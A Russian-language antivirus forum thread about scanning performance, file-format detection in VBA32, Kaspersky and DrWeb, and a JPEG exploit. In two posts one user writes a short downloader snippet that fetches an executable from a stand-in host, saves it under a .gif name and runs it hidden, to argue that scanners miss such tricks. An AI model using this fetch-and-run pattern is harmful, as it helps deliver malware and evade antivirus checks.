Показано с 1 по 18 из 18.

Обсуждение антивирусов

  1. #1
    Full Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Minos
    Регистрация
    03.10.2004
    Адрес
    Krasnodar, 23 RUS
    Сообщений
    499
    Вес репутации
    62

    Обсуждение антивирусов

    Если теперь нужно еще и картинки проверять на вирусы, то скоро до 30% вычеслительных мощностей будет уходить на безопасность. Не надо поддаваться панике, ставим заплатку и пусть себе не проверяют антивирусы эти картинки, не барское это дело из-за одной дырки загружать пользовательские компьютеры, они и так бедные на пыхтят от нагрузки.

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Geser
    Guest

    Re:Важно! Jpeg exploit (эксплоит)

    Цитата Сообщение от Minos
    Если теперь нужно еще и картинки проверять на вирусы, то скоро до 30% вычеслительных мощностей будет уходить на безопасность. Не надо поддаваться панике, ставим заплатку и пусть себе не проверяют антивирусы эти картинки, не барское это дело из-за одной дырки загружать пользовательские компьютеры, они и так бедные на пыхтят от нагрузки.
    30% это ещё по божески. Я вон с КАВ перешел на Vba32, так комп раза в 2 быстрее заработал

  4. #3
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Iceman
    Регистрация
    18.09.2004
    Адрес
    Moscow, RU
    Сообщений
    830
    Вес репутации
    106

    Re:Важно! Jpeg exploit (эксплоит)

    Я тоже попробовал VBA: честно говоря, я бы выбрал Каспера ;D.
    Но, к счастью, всё таки Доктор не так уж и плох, как говорят ;D

  5. #4
    Geser
    Guest

    Re:Важно! Jpeg exploit (эксплоит)

    Цитата Сообщение от Iceman
    Я тоже попробовал VBA: честно говоря, я бы выбрал Каспера ;D.
    По надёжности, понятное дело

  6. #5
    Full Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Minos
    Регистрация
    03.10.2004
    Адрес
    Krasnodar, 23 RUS
    Сообщений
    499
    Вес репутации
    62

    Re:Важно! Jpeg exploit (эксплоит)

    Цитата Сообщение от Geser
    30% это ещё по божески. Я вон с КАВ перешел на Vba32, так комп раза в 2 быстрее заработал
    По божески??? Я что, покупаю компьютер, для того что бы 2 дня в неделю заниматься ловлей вирусов? Нет мне, работать надо, а когда дело доходит до видео или компиляции чего нибудь эдакого - мне все мои 3000 "попугаев" нужны, и не собираюсь я львиную их долю отдавать за красивые глазки. Безопасность безопасностью, но и меру надо чувствовать.

    На счет VBA, полностью согласен. На следующей неделе посмотрю как это чудо на P166 выглюдит в сравнении с DrWeb. Огорчает, что нет проверки "по формату", как в DrWeb. К стате DrWeb с включенной проверкой всех файлов тоже не очень шустро бегает. Давайте настоим на включении в VBA такой функции, мы же beta-тестеры .

  7. #6
    Geser
    Guest

    Re:Важно! Jpeg exploit (эксплоит)

    Цитата Сообщение от Minos
    Огорчает, что нет проверки "по формату", как в DrWeb. К стате DrWeb с включенной проверкой всех файлов тоже не очень шустро бегает. Давайте настоим на включении в VBA такой функции, мы же beta-тестеры .
    Я так понимаю что они в любом случае проверяют структуру файла, и дальше работают с ним в соответствии со структурой. Нужно будет спросить, если тут на заметят вопрос

  8. #7
    Geser
    Guest

    Re:Важно! Jpeg exploit (эксплоит)

    Цитата Сообщение от Minos
    К стате DrWeb с включенной проверкой всех файлов тоже не очень шустро бегает.
    Это ерунда, ты переключи его в режим проверки файлов при открытии и запуске. Вот это весело. У меня когда Ослик работал и переодически читал из самораскрывающегося архива мег на 300 комп подвисал намертво.

  9. #8
    Full Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Minos
    Регистрация
    03.10.2004
    Адрес
    Krasnodar, 23 RUS
    Сообщений
    499
    Вес репутации
    62

    Re:Важно! Jpeg exploit (эксплоит)

    Цитата Сообщение от Geser
    Это ерунда, ты переключи его в режим проверки файлов при открытии и запуске. Вот это весело. У меня когда Ослик работал и переодически читал из самораскрывающегося архива мег на 300 комп подвисал намертво.
    Я об этом речь и веду, производительность зависит не только от оптимизации алгоритмов, но и от объема проверяемых файлов. Вообще, теоретически, нужно, что бы монитор использовал не все записи базы, а только актуальные для данного компьютера. Вместо этого именно антивирус должен следить за закрытием дырок.
    Полный заслон желательно ставить только в местах возможного проникновения вирусов, фильтры почты, сканирование сменных носителей, интернет трафик, а действия пользователя внутри "периметра" прверять по сокращенной программе (например только изменившиеся файлы и автозагрузку). Вместо этого в базы можно добавить информацию об уязвимостях и способах их перекрытия. Ведь значительная часть современных вирусов становится безполезной, если в системе закрыты все дырки. Выигрыш в скорости защет сокращения объема дурной работы должен быть значителен.

  10. #9
    Geser
    Guest

    Re:Важно! Jpeg exploit (эксплоит)

    Цитата Сообщение от Minos
    Я об этом речь и веду, производительность зависит не только от оптимизации алгоритмов, но и от объема проверяемых файлов. Вообще, теоретически, нужно, что бы монитор использовал не все записи базы, а только актуальные для данного компьютера. Вместо этого именно антивирус должен следить за закрытием дырок.
    Полный заслон желательно ставить только в местах возможного проникновения вирусов, фильтры почты, сканирование сменных носителей, интернет трафик, а действия пользователя внутри "периметра" прверять по сокращенной программе (например только изменившиеся файлы и автозагрузку). Вместо этого в базы можно добавить информацию об уязвимостях и способах их перекрытия. Ведь значительная часть современных вирусов становится безполезной, если в системе закрыты все дырки. Выигрыш в скорости защет сокращения объема дурной работы должен быть значителен.
    Ну представь себе что проскочил неизвестный вирус. На самом компе ты все файлы не проверяешь, значит через какое-то время даже если этот вирус добавлен в базу данных он будет спокойно жить пока ты не запустишь полное сканирование. Именно такие проблемы у ДрВеб с их "оптимальным режимом". Если ты уверен что не запускаешь на компе левые программы, в которых могут быть вирусы или трояны, то просто отключи монитор, и раз в неделю делай полное сканирование на всякий случай. А для чайников постоянная проверка всех файлов монитором необходима.

  11. #10
    VBA Репутация
    Регистрация
    29.09.2004
    Сообщений
    96
    Вес репутации
    52

    Re:Важно! Jpeg exploit (эксплоит)

    Цитата Сообщение от Geser
    Я так понимаю что они в любом случае проверяют структуру файла, и дальше работают с ним в соответствии со структурой. Нужно будет спросить, если тут на заметят вопрос
    Верно, формат файла всегда определяется и проверка далее идет в соответствии с форматом. Да, есть один такой неприятный формат файлов - досовские COM исполняемые файлы. Так вот, на самом деле они совсем не имеют формата и их невозможно распознать. Так что есть выбор: либо проверять все файлы с размером менее 64K как COM файлы и дополнительно тормозить систему (а COM-вирусы уже практически вымерли как класс), либо придумать что-то еще. Так вот, мы пошли вторым путем и в файлах, не имеющих исполняемого расширения (COM, EXE, PIF, SCR, ...), COM-вирусы в нормальном режиме сканирования не ищем. С точки зрения безопасности, проблем тут нет, с неправильным расширением такой файл запустить не получится, его все равно придется переименовать, а в этом случае монитор его поймает. Есть еще 'избыточный' режим, в котором поиск COM-фирусов производится во всех файлах подходящего размера, независимо от расширения, а также используется ряд других дополнительных методов поиска вирусов, которые обычно не нужны, но могут помочь в каких-либо крайне нестандартных случаях. Кстати, при тестировании антивируса на коллекции вирусов лучше избыточный режим включать, поскольку вирусы в коллекциях обычно лежат в переименованном виде.

    Кстати, для антивирусного монитора у нас 'избыточный режим' и проверка архивов не используются и их невозможно включить (раньше эти опции были доступны в настройках). Но опыт показывает, что всегда находятся желающие защититься 'по полной программе', которые потом начинают жаловаться, что комп тормозит

  12. #11
    Full Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Minos
    Регистрация
    03.10.2004
    Адрес
    Krasnodar, 23 RUS
    Сообщений
    499
    Вес репутации
    62

    Re:Важно! Jpeg exploit (эксплоит)

    Цитата Сообщение от Geser
    Ну представь себе что проскочил неизвестный вирус. На самом компе ты все файлы не проверяешь, значит через какое-то время даже если этот вирус добавлен в базу данных он будет спокойно жить пока ты не запустишь полное сканирование. Именно такие проблемы у ДрВеб с их "оптимальным режимом". Если ты уверен что не запускаешь на компе левые программы, в которых могут быть вирусы или трояны, то просто отключи монитор, и раз в неделю делай полное сканирование на всякий случай. А для чайников постоянная проверка всех файлов монитором необходима.
    Ну, проскачил, для жития ему необходимо запуститься, а тут его можно и накрыть при проверке автозагрузки или накрыть при запуске. Зачем проверять все подвернувшиеся файлы?

  13. #12
    Geser
    Guest

    Re:Важно! Jpeg exploit (эксплоит)

    Цитата Сообщение от Minos
    Ну, проскачил, для жития ему необходимо запуститься, а тут его можно и накрыть при проверке автозагрузки или накрыть при запуске. Зачем проверять все подвернувшиеся файлы?
    Разные причины есть. Вот отключил ты зачем-то временно монитор, запустил случайно вирус, а потом включил, и долго ещё не узнаешь что у тебя вирус. А если проверять все файлы, то очень быстро монитор начнёт ругаться.

  14. #13
    VBA Репутация
    Регистрация
    29.09.2004
    Сообщений
    96
    Вес репутации
    52

    Re:Важно! Jpeg exploit (эксплоит)

    Цитата Сообщение от Minos
    Ну, проскачил, для жития ему необходимо запуститься, а тут его можно и накрыть при проверке автозагрузки или накрыть при запуске. Зачем проверять все подвернувшиеся файлы?
    Осталась только научиться отличать обычное открытие файла от его запуска
    А это не так просто, например есть макровирусы в doc-файлах и скриптовые вирусы в текстовых файлах. Запуск интерпретатора (того же ворда, например) сам по себе не опасен. Проблемы начинаются, когда этот интерпретатор открывает файл, содержащий вирус, и начинает исполнять код, прочитанный оттуда.

  15. #14
    Visiting Helper Репутация
    Регистрация
    03.10.2004
    Сообщений
    699
    Вес репутации
    56

    Re:Обсуждение антивирусов

    aga... a kak vam takoy variatn?

    downloader.exe

    UrlDownloadToFile("www.vir.com/vir.exe","c:\program.gif");
    WinExec("c:\program.gif",SW_HIDE);

    vba v prolete... da i mnogie drugie toze

  16. #15
    VBA Репутация
    Регистрация
    29.09.2004
    Сообщений
    96
    Вес репутации
    52

    Re:Обсуждение антивирусов

    Цитата Сообщение от Sanja
    aga... a kak vam takoy variatn?

    downloader.exe

    UrlDownloadToFile("www.vir.com/vir.exe","c:\program.gif");
    WinExec("c:\program.gif",SW_HIDE);

    vba v prolete... da i mnogie drugie toze
    Установка 'проверять все файлы' поможет в данной ситуации
    Также downloader.exe в данном случае является вредоносной программой и его вполне можно детектировать как трояна.

  17. #16
    Visiting Helper Репутация
    Регистрация
    03.10.2004
    Сообщений
    699
    Вес репутации
    56

    Re:Обсуждение антивирусов

    nu skazem downloader.exe ne lovitsa a banner.gif lovitsa

    no u 99.99% proverka stoit nikak ne "all files" tak 4to.. virus budet zapushen i zdelaet svoe delo

  18. #17
    Geser
    Guest

    Re:Обсуждение антивирусов

    Цитата Сообщение от Sanja
    nu skazem downloader.exe ne lovitsa a banner.gif lovitsa

    no u 99.99% proverka stoit nikak ne "all files" tak 4to.. virus budet zapushen i zdelaet svoe delo
    Поэтому было бы неплохо если бы антивирус мог работать как локальный прокси, и фильтровать весь трафик.

  19. #18
    Full Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Minos
    Регистрация
    03.10.2004
    Адрес
    Krasnodar, 23 RUS
    Сообщений
    499
    Вес репутации
    62

    Re:Обсуждение антивирусов

    Цитата Сообщение от Geser
    Поэтому было бы неплохо если бы антивирус мог работать как локальный прокси, и фильтровать весь трафик.
    Плюс скрипт-эвристик совместимый с IE, Mozilla и Opera. И вообще высший класс бы получился.

Похожие темы

  1. Обсуждение антивирусов
    От Andrey в разделе Антивирусы
    Ответов: 282
    Последнее сообщение: 08.09.2009, 19:23
  2. Обсуждение тестов самозащиты антивирусов
    От GREET в разделе Антивирусы
    Ответов: 37
    Последнее сообщение: 28.02.2008, 00:50
  3. Исследование антивирусов + обсуждение
    От kvit в разделе Антивирусы
    Ответов: 24
    Последнее сообщение: 20.11.2005, 20:19
  4. Обсуждение ДрВеб
    От DenZ в разделе Антивирусы
    Ответов: 22
    Последнее сообщение: 28.09.2005, 10:20

Метки для этой темы

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.00913 seconds with 16 queries